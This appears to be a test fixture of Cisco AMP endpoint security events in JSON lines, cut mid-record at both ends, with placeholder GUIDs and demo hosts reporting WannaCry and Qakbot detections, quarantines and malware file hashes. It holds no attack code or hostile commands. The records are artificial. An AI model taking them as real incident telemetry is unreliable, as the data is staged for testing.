Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 